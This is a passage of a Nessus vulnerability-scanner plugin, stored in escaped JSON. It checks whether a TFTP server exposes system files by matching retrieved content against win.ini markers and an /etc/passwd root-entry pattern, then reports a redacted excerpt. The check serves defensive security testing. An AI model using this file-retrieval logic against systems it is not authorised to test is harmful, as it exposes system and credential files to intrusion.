Check contents\n if (\n (\"win.ini\" >< file && \"; for 16-bit app support\" >< f) ||\n (\"win.ini\" >< file && \"[Mail]\" >< f) ||\n (f =~ \"root:.*:0:[01]:\")\n )\n {\n vulns = make_list(vulns, file);\n obtained_file = file;\n if (strlen(f) > 600)\n obtained_contents = substr(f, 0, 600);\n else\n obtained_contents = f;\n\n if (!thorough_tests) break;\n }\n }\n }\n if (max_index(vulns) && !thorough_tests) break;\n}\n\nif (max_index(vulns))\n{\n if (report_verbosity > 0)\n {\n vulns = list_uniq(vulns);\n foreach vuln (vulns)\n successful_attempts += '\\n '+vuln;\n obtained_contents = data_protection::redact_etc_passwd(output:obtained_contents);\n report =\n '\\n' + 'Nessus was able to access a system file via the TFTP server' +\n '\\n' + 'using each of the following requests : ' +\n '\\n' +\n successful_attempts +\n '\\n';\n\n if (\n !defined_func(\"nasl_level\") ||\n nasl_level() < 5200 ||\n !isnull(get_preference(\"sc_version\"))\n )\n {\n report +=\n '\\n' + 'Here is the contents of the file Nessus was able to obtain :' +\n '\\n' + snip +\n '\\n' + obtained_contents +\n '\\n' + snip +\n '\\n';\n security_warning(port:port, proto:\"udp\", extra:report);\n }\n else\n {\n # Sanitize file names\n if (\"/\" >< obtained_file) obtained_file = ereg_replace(pattern:\"^.+/([^/]+)$\", replace:\"\\1\", string:obtained_file);\n else if (\"\\\" >< obtained_file) obtained_file = ereg_replace(pattern:\"^.+\\\\([^\\\\]+)$\", replace:\"\\1\", string:obtained_file);\n\n report +=\n '\\n' + 'Attached is a copy of the contents' + '\\n';\n\n attachments = make_list();\n attachments[0] = make_array();\n attachments[0][\"type\"] = \"text/plain\";\n attachments[0][\"name\"] = obtained_file;\n attachments[0][\"value\"] = obtained_contents;\n\n security_report_with_attachments(\n port : port,\n proto : \"udp\",\n level : 2,\n extra : report,\n attachments : attachments\n );\n }\n }\n else security_warning(port:port, proto:\"udp\");\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"TFTP server\", port);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}